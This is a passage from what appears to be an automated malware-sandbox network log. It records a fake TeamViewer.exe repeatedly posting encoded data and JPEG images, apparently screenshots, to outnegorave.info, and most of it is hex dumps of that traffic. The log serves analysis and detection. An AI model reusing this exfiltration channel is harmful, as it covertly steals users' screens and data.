                                                                                                                                    2021-09-15 11:52:46 UTC3120OUTData Raw: 9e d7 fe 1a ea 16 7b a6 d2 24 fb 6c 23 9f 2d b0 b2 8f e8 df a7 d2 99 e2 0f 87 1a 8d 86 e9 b4 a6 37 d0 0e 76 01 89 54 7d 3f 8b f0 e7 da ba 0f 08 f8 1b 43 36 b1 df 5c cb fd a3 21 ea 8c bb 52 36 ee a5 3a e4 77 0d f9 52 03 ca e6 8a 48 25 68 a7 8d e3 91 0e 19 1d 48 20 fb 83 4c ae 8f e2 12 24 7e 35 bf 48 d5 51 14 44 02 a8 c0 03 ca 4a e7 2a 84 15 6f 4d b2 6b eb a1 18 3b 50 72 ed e8 2a a5 74 1e 17 db 8b 90 7a fc bf 97 35 32 76 5a 11 52 a2 a6 b9 da bd 8d cb 3d 1a dc 26 cb 6b 31 26 d1 c9 29 b8 fe 35 5f 50 f0 e0 b8 56 11 da b4 33 0e 85 50 8f cc 56 e8 df fd 9b 6e 22 c9 8c 67 7e 3f bf 9e ff 00 86 2b 6f 4d f3 7e c2 9e 7e 77 64 ed dd d7 6f 6f eb 58 62 69 4a 86 1d 62 14 b5 ec 7a 30 c7 53 ad 3f 65 18 7b a7 8b 4d 13 c1 33 c5 2a 95 74 25 58 1e c6 99 5b 5e 31 f2 ff 00 e1 28
                                                                                                                                    Data Ascii: {$l#-7vT}?C6\!R6:wRH%hH L$~5HQDJ*oMk;Pr*tz52vZR=&k1&)5_PV3PVn"g~?+oM~~wdooXbiJbz0S?e{M3*t%X[^1(
                                                                                                                                    2021-09-15 11:52:46 UTC3123OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 33 32 33 39 36 37 33 37 38 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1323967378--
                                                                                                                                    2021-09-15 11:52:47 UTC3123INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:47 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=5994ed236f8bfb5588079add9ffef02a512ab1e912aa3b636483e00cf9edaf28; expires=Thu, 15-Sep-2022 11:52:47 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GjmFpksB51zXzKjbkdrQszS9unt0Uydas78r8focaGeOR6vg%2BJJgL5lq2tP9YteUN0Qk2D0HUgyWjmVMnzZQItuW4D2v7nCvXqYMnbOTyFld%2Bam1EBAoLCLFijGmo5ZfwfKF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a69ceaab5c62-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:47 UTC3124INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    37192.168.2.549829172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:48 UTC3124OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84983
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------29895310
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:48 UTC3124OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 39 38 39 35 33 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------29895310Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:48 UTC3124OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 70 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^p;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:48 UTC3124OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:48 UTC3140OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:48 UTC3156OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:48 UTC3172OUTData Raw: 96 81 05 2d 14 62 98 85 a5 a4 a2 98 80 d2 8a 4a 51 40 0a 29 29 45 21 a6 20 a5 a4 a0 52 01 c2 9c 29 b4 b5 48 4c 5a 29 29 69 80 b4 51 45 04 8b 45 14 53 00 a2 8a 28 10 e1 4b 4d 14 a2 9a 01 69 69 29 69 92 14 b4 94 a2 98 0b 45 14 53 10 b4 52 52 d0 20 a5 a4 a5 a6 80 75 14 82 96 99 21 4a 28 a2 98 0b 45 02 96 98 84 a4 a5 a2 80 10 75 a7 d3 07 5a 7d 08 18 50 68 a2 99 20 29 69 05 3b 14 20 62 81 4e a6 d3 85 52 25 89 de 96 90 f5 a7 0a 60 20 a7 53 69 45 31 31 68 a2 8a 04 02 96 90 53 a9 88 4a 75 25 14 c1 8e a5 a6 8a 5a 64 8e cd 28 a6 d2 8a 68 4c 70 a5 a6 d3 85 32 58 52 d2 51 4c 42 d1 49 4b 40 05 2d 25 2d 00 2d 2d 36 9d 40 98 52 8a 4a 5a 04 2d 14 94 b4 08 29 68 a2 98 05 28 a2 94 50 26 2d 02 92 94 50 23 43 49 1f bf 73 e8 86 ab 1e a7 eb 56 b4 9f f5 d2 7f ba 6a a9 ea 7e b5
                                                                                                                                    Data Ascii: -bJQ@))E! R)HLZ))iQEES(KMii)iESRR u!J(EuZ}Ph )i; bNR%` SiE11hSJu%Zd(hLp2XRQLBIK@-%---6@RJZ-)h(P&-P#CIsVj~
                                                                                                                                    2021-09-15 11:52:48 UTC3188OUTData Raw: 69 69 88 76 69 69 b4 b4 08 70 a5 14 da 50 6a 93 25 92 0a 29 01 a2 a9 12 2d 2d 25 19 a6 16 17 34 66 90 52 d1 71 58 51 4b 9a 65 2e 69 dc 2c 3f 34 b4 cc d2 e6 99 36 1c 29 73 4d cd 14 ee 16 1f 9a 33 4d cd 1b bd a8 b8 ac 48 0d 2e 6a 3d c7 d6 8c fb d3 b8 ac 49 91 46 6a 3c d2 e6 8b 8a c3 f3 46 69 b9 a3 34 ee 16 1d 4b 9a 6d 19 a2 e2 b0 ec d2 e6 99 9a 33 4e e1 61 f9 a3 34 cd d4 9b a8 b8 72 92 66 8c d4 7b a8 dd 4a e1 ca 49 ba 93 75 44 5e 9a 5e 87 21 a8 13 16 a6 97 a8 8b d3 4b 54 b9 94 a0 4a 5e 98 5e a3 2d 4c 2d 50 e4 5a 81 21 7f 7a 61 6a 61 6a 61 6a 87 23 45 11 e5 a9 85 a9 a5 a9 85 ab 37 23 45 11 c4 d3 09 a4 26 92 a1 b2 d2 14 9a 4a 4a 33 49 8e c2 1a 28 34 da 92 90 66 8a 4a 4a 57 1d 8a 18 ef 4b 49 45 72 9d 62 d1 45 18 a0 02 8a 28 a0 42 d1 45 25 00 14 51 45 00 14 b4
                                                                                                                                    Data Ascii: iiviipPj%)--%4fRqXQKe.i,?46)sM3MH.j=IFj<Fi4Km3Na4rf{JIuD^^!KTJ^^-L-PZ!zajajaj#E7#E&JJ3I(4fJJWKIErbE(BE%QE
                                                                                                                                    2021-09-15 11:52:48 UTC3204OUTData Raw: 11 cf 96 d8 59 47 f4 6f d3 e9 4c f1 07 c3 8d 46 c3 74 da 53 1b e8 07 3b 00 c4 aa 3e 9f c5 f8 73 ed 5d 07 84 7c 0d a1 9b 58 ef ae 65 fe d1 90 f5 46 5d a9 1b 77 52 9d 72 3b 86 fc a9 01 e5 73 45 24 12 b4 53 c6 f1 c8 87 0c 8e a4 10 7d c1 a6 57 47 f1 09 12 3f 1a df a4 6a a8 8a 22 01 54 60 01 e5 25 73 95 42 0a b7 a6 d9 35 f5 d0 8c 1d a8 39 76 f4 15 52 ba 0f 0b ed c5 c8 3d 7e 5f cb 9a 99 3b 2d 08 a9 51 53 5c ed 5e c6 e5 9e 8d 6e 13 65 b5 98 93 68 e4 94 dc 7f 1a af a8 78 70 5c 2b 08 ed 5a 19 87 42 a8 47 e6 2b 74 6f fe cd b7 11 64 c6 33 bf 1f df cf 7f c3 15 b7 a6 f9 bf 61 4f 3f 3b b2 76 ee eb b7 b7 f5 ac 31 34 a5 43 0e b1 0a 5a f6 3d 18 63 a9 d6 9f b2 8c 3d d3 c5 a6 89 e0 99 e2 95 4a ba 12 ac 0f 63 4c ad af 18 f9 7f f0 94 5e f9 58 c6 e5 ce 3d 76 8c fe b5 8b 5b 53
                                                                                                                                    Data Ascii: YGoLFtS;>s]|XeF]wRr;sE$S}WG?j"T`%sB59vR=~_;-QS\^nehxp\+ZBG+tod3aO?;v14CZ=c=JcL^X=v[S
                                                                                                                                    2021-09-15 11:52:48 UTC3207OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 39 38 39 35 33 31 30 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------29895310--
                                                                                                                                    2021-09-15 11:52:52 UTC3207INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:52 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=602ee26cb44b087d943dc459fb822989eb5923319ace30dac624cd1068b23fe3; expires=Thu, 15-Sep-2022 11:52:48 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Mhh6w43hRAIQJ5I1F4UM2b0uq2tn2hIYKI1rYXGkRO6rHJhGC06kq2CvVen07%2Bp4tzGylQqui5%2Fjz2YLTY9yK5ZM2ecPRCo4MrPZfoM0U75fe5bU1TWY02ydEMfGQTfPnqdf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6a61d0a2c19-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:52 UTC3208INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    38192.168.2.549833172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:52 UTC3208OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84996
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------4240026889
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:52 UTC3208OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 32 34 30 30 32 36 38 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------4240026889Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:52 UTC3208OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 7b 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^{;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:52 UTC3208OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:52 UTC3224OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:52 UTC3240OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:52 UTC3256OUTData Raw: b4 08 29 68 a3 14 c4 2d 2d 25 14 c4 06 94 52 52 8a 00 51 49 4a 29 0d 31 05 2d 25 02 90 0e 14 e1 4d a5 aa 42 62 d1 49 4b 4c 05 a2 8a 28 24 5a 28 a2 98 05 14 51 40 87 0a 5a 68 a5 14 d0 0b 4b 49 4b 4c 90 a5 a4 a5 14 c0 5a 28 a2 98 85 a2 92 96 81 05 2d 25 2d 34 03 a8 a4 14 b4 c9 0a 51 45 14 c0 5a 28 14 b4 c4 25 25 2d 14 00 83 ad 3e 98 3a d3 e8 40 c2 83 45 14 c9 01 4b 48 29 d8 a1 03 14 0a 75 36 9c 2a 91 2c 4e f4 b4 87 ad 38 53 01 05 3a 9b 4a 29 89 8b 45 14 50 20 14 b4 82 9d 4c 42 53 a9 28 a6 0c 75 2d 34 52 d3 24 76 69 45 36 94 53 42 63 85 2d 36 9c 29 92 c2 96 92 8a 62 16 8a 4a 5a 00 29 69 29 68 01 69 69 b4 ea 04 c2 94 52 52 d0 21 68 a4 a5 a0 41 4b 45 14 c0 29 45 14 a2 81 31 68 14 94 a2 81 1a 1a 48 fd fb 9f 44 35 58 f5 3f 5a b5 a4 ff 00 ae 93 fd d3 55 4f 53 f5
                                                                                                                                    Data Ascii: )h--%RRQIJ)1-%MBbIKL($Z(Q@ZhKIKLZ(-%-4QEZ(%%->:@EKH)u6*,N8S:J)EP LBS(u-4R$viE6SBc-6)bJZ)i)hiiRR!hAKE)E1hHD5X?ZUOS
                                                                                                                                    2021-09-15 11:52:52 UTC3272OUTData Raw: 4b 4d a5 a0 43 85 14 94 b5 42 14 52 d3 73 4b 4c 43 b3 4b 4d a5 a0 43 85 28 a6 d2 83 54 99 2c 90 51 48 0d 15 48 91 69 69 28 cd 30 b0 b9 a3 34 82 96 8b 8a c2 8a 5c d3 29 73 4e e1 61 f9 a5 a6 66 97 34 c9 b0 e1 4b 9a 6e 68 a7 70 b0 fc d1 9a 6e 68 dd ed 45 c5 62 40 69 73 51 ee 3e b4 67 de 9d c5 62 4c 8a 33 51 e6 97 34 5c 56 1f 9a 33 4d cd 19 a7 70 b0 ea 5c d3 68 cd 17 15 87 66 97 34 cc d1 9a 77 0b 0f cd 19 a6 6e a4 dd 45 c3 94 93 34 66 a3 dd 46 ea 57 0e 52 4d d4 9b aa 22 f4 d2 f4 39 0d 40 98 b5 34 bd 44 5e 9a 5a a5 cc a5 02 52 f4 c2 f5 19 6a 61 6a 87 22 d4 09 0b fb d3 0b 53 0b 53 0b 54 39 1a 28 8f 2d 4c 2d 4d 2d 4c 2d 59 b9 1a 28 8e 26 98 4d 21 34 95 0d 96 90 a4 d2 52 51 9a 4c 76 10 d1 41 a6 d4 94 83 34 52 52 52 b8 ec 50 c7 7a 5a 4a 2b 94 eb 16 8a 28 c5 00 14
                                                                                                                                    Data Ascii: KMCBRsKLCKMC(T,QHHii(04\)sNaf4KnhpnhEb@isQ>gbL3Q4\V3Mp\hf4wnE4fFWRM"9@4D^ZRjaj"SST9(-L-M-L-Y(&M!4RQLvA4RRRPzZJ+(
                                                                                                                                    2021-09-15 11:52:52 UTC3288OUTData Raw: 93 ed b0 8e 7c b6 c2 ca 3f a3 7e 9f 4a 67 88 3e 1c 6a 36 1b a6 d2 98 df 40 39 d8 06 25 51 f4 fe 2f c3 9f 6a e8 3c 23 e0 6d 0c da c7 7d 73 2f f6 8c 87 aa 32 ed 48 db ba 94 eb 91 dc 37 e5 48 0f 2b 9a 29 20 95 a2 9e 37 8e 44 38 64 75 20 83 ee 0d 32 ba 3f 88 48 91 f8 d6 fd 23 55 44 51 10 0a a3 00 0f 29 2b 9c aa 10 55 bd 36 c9 af ae 84 60 ed 41 cb b7 a0 aa 95 d0 78 5f 6e 2e 41 eb f2 fe 5c d4 c9 d9 68 45 4a 8a 9a e7 6a f6 37 2c f4 6b 70 9b 2d ac c4 9b 47 24 a6 e3 f8 d5 7d 43 c3 82 e1 58 47 6a d0 cc 3a 15 42 3f 31 5b a3 7f f6 6d b8 8b 26 31 9d f8 fe fe 7b fe 18 ad bd 37 cd fb 0a 79 f9 dd 93 b7 77 5d bd bf ad 61 89 a5 2a 18 75 88 52 d7 b1 e8 c3 1d 4e b4 fd 94 61 ee 9e 2d 34 4f 04 cf 14 aa 55 d0 95 60 7b 1a 65 6d 78 c7 cb ff 00 84 a2 f7 ca c6 37 2e 71 eb b4 67 f5
                                                                                                                                    Data Ascii: |?~Jg>j6@9%Q/j<#m}s/2H7H+) 7D8du 2?H#UDQ)+U6`Ax_n.A\hEJj7,kp-G$}CXGj:B?1[m&1{7yw]a*uRNa-4OU`{emx7.qg
                                                                                                                                    2021-09-15 11:52:52 UTC3291OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 32 34 30 30 32 36 38 38 39 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------4240026889--
                                                                                                                                    2021-09-15 11:53:15 UTC3291INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:53:15 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=5bdedd4b6ed9090b9a1ac0068609d698fe8eafb41b220c31c3d72c7e542623c9; expires=Thu, 15-Sep-2022 11:52:54 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
